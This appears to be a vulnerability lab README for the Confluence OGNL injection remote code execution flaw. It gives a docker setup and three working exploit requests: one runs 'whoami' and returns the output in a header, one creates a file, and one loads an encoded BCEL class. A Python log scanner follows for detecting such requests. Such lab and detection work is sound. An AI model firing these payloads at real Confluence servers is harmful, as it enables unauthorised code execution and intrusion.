Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. The OGNL
injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
Run

docker-compose up

Follow the installation guide and set up the database with:

user: postgres
passwd: postgres
database: confluence
Send the following request (the command output is returned in the X-Cmd-Response response header):
GET /%24%7B(Class.forName(%22jav%22+%22ax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22js%22).eval(%22var%20p%20%3D%20org.apache.commons.io.IOUtils.toString(java.lang.Runtime.getRuntime().exec('whoami').getInputStream(),'utf-8')%3B%20com.opensymphony.webwork.ServletActionContext.getResponse().setHeader('X-Cmd-Response',p)%3B%22))%7D/ HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Or a shorter PoC that does not return the command output in the response:
GET /%24%7B(Class.forName(%22java%22+%22.lang.Runtime%22).getMethod(%22getRuntime%22,%20null).invoke(null,%20null).exec(%22touch%20/tmp/success%22))%7D/ HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Or via the BCEL ClassLoader:
GET /%24%7B(Class.forName(%22org.ap%22+%22ache.bcel.util.ClassLoader%22).newInstance().loadClass(%22$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQMO$h1$Q$7dN$96$ecv1M$I$J$l$z$z$l$fd$m$c9$a1$x$qn$m$$$VHU$b7$Nj$Q$9c$j$c7$K$a6$c9$3a$dax$x$feQ$cf$5c$d2$aa$H$7e$A$3f$K1$5eR$KmW$da$Z$cf$bc$997$cf$e3$eb$9b_W$Av$d0$K$f1$E$cb$nV$f0$y$c0s$e7W$5d$e6$85$8f$97$nJX$f3$b1$eec$83$a1$b4$a7$Tm$f7$Z$8a$8d$e6$J$83$f7$de$f4$UC9$d6$89$fa$9c$N$bb$w$3d$W$dd$Be$aa$b1$91bp$oR$ed$e2i$d2$b3gz$cc0$lK3$8cl$da$XIODGF$ee2$E$7br0efTY$8f$cf$c57$Ri$T$7dh$l$5cH5$b2$da$qT6$d7$b1B$7e$fd$qF9$p$89c$I$3b$sK$a5$3a$d4nB$40l$ef$5c$xG$88Y$l$9b$i$af$f0$9aa$c1$9aL$9e$adGv8$8a$c6$99$94j$3c$de$e6x$83$b7$i$5bh$Q$fe$9fq$iM$cc$d2$dd$fe$S$cbP$c9$8b$H$o$e9G$ed$ee$b9$92$96$ae$f4$t$f5$rK$ac$k$92$96$b0$af$ec$7dPo4$e3$7fj$e8B$9e$baPD$b9$d5x$80vl$aa$93$fe$ee$c3$86$a3$d48$cdnQ$d6$dc$e1$M$b5G$9c$d3$$$S$3c$a2$83$cd$Xu$9c$K$a9$b0$81$80$9e$d2$7d$F0$b7$X$b2$9c$a2$88$3c$p$3f$d3$fa$Bv$99$c3sdKwI$3c$r$cb$a7$e72$w$e4$D$cc$df7$f7r2$a0$fe$T$85jq$Co$82$99$d3$ef$I$3e$b6$s$f0$_s$88S$5b$J$c5$9ct$91H$i$B$t$822$a9$a9$90$8e$gE$bf$87T$e0$a1$8a$F$8aj$f4$fb$u$b4$7d$d4$3d$C$Ws$5dK$b7M$fe$b8$8b$a9$C$A$A%22).newInstance())%7D/ HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
This creates the file /tmp/success1.
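The requests above share one shape: a URL-encoded OGNL expression (`${...}`) placed in the request path, with class names split across string concatenation ("jav"+"ax.script...") to evade naive keyword matching. The following detection script is an added example for defenders, not part of this environment's own files; it percent-decodes request paths from constructed web-server access log lines, folds the concatenated string literals back together, and flags paths that carry an OGNL expression referencing the reflection and scripting classes seen in these PoCs.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (Combined Log Format); not real traffic.
# The two injection paths are cut down to their class-loading prefix.
SAMPLE_LOG = """\
127.0.0.1 - - [03/Jun/2022:10:00:01 +0000] "GET /%24%7B(Class.forName(%22jav%22+%22ax.script.ScriptEngineManager%22).newInstance())%7D/ HTTP/1.1" 302 0 "-" "curl/7.79"
127.0.0.1 - - [03/Jun/2022:10:00:02 +0000] "GET /display/DS/Welcome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
127.0.0.1 - - [03/Jun/2022:10:00:03 +0000] "GET /%24%7B(Class.forName(%22java%22+%22.lang.Runtime%22).getMethod(%22getRuntime%22,%20null).invoke(null,%20null))%7D/ HTTP/1.1" 302 0 "-" "curl/7.79"
"""

# Pulls method and raw (still encoded) path out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[0-9.]+"')
# Matches two adjacent Java string literals joined with "+", e.g. "jav"+"ax".
CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
# Class names used by the PoC requests; extend this list for your own rules.
SUSPICIOUS = (
    "Class.forName",
    "javax.script.ScriptEngineManager",
    "java.lang.Runtime",
    "bcel.util.ClassLoader",
)


def normalize_path(raw_path: str) -> str:
    """Percent-decode (twice, to handle double encoding) and fold "a"+"b" into "ab"."""
    decoded = unquote(unquote(raw_path))
    while True:
        folded = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', decoded)
        if folded == decoded:
            return folded
        decoded = folded  # repeat until no more literal pairs remain


def is_ognl_injection(raw_path: str) -> bool:
    """True when the path carries an OGNL expression that names a suspicious class."""
    path = normalize_path(raw_path)
    if "${" not in path:
        return False
    return any(marker in path for marker in SUSPICIOUS)


def scan_log(text: str) -> list[str]:
    """Return the normalized paths of every request that looks like OGNL injection."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_ognl_injection(m.group("path")):
            hits.append(normalize_path(m.group("path")))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious request path:", hit)
```

Because matching runs on the decoded and folded path, neither percent-encoding nor splitting a class name across literals hides the marker; the same normalization can be applied to reverse-proxy or WAF logs in front of Confluence.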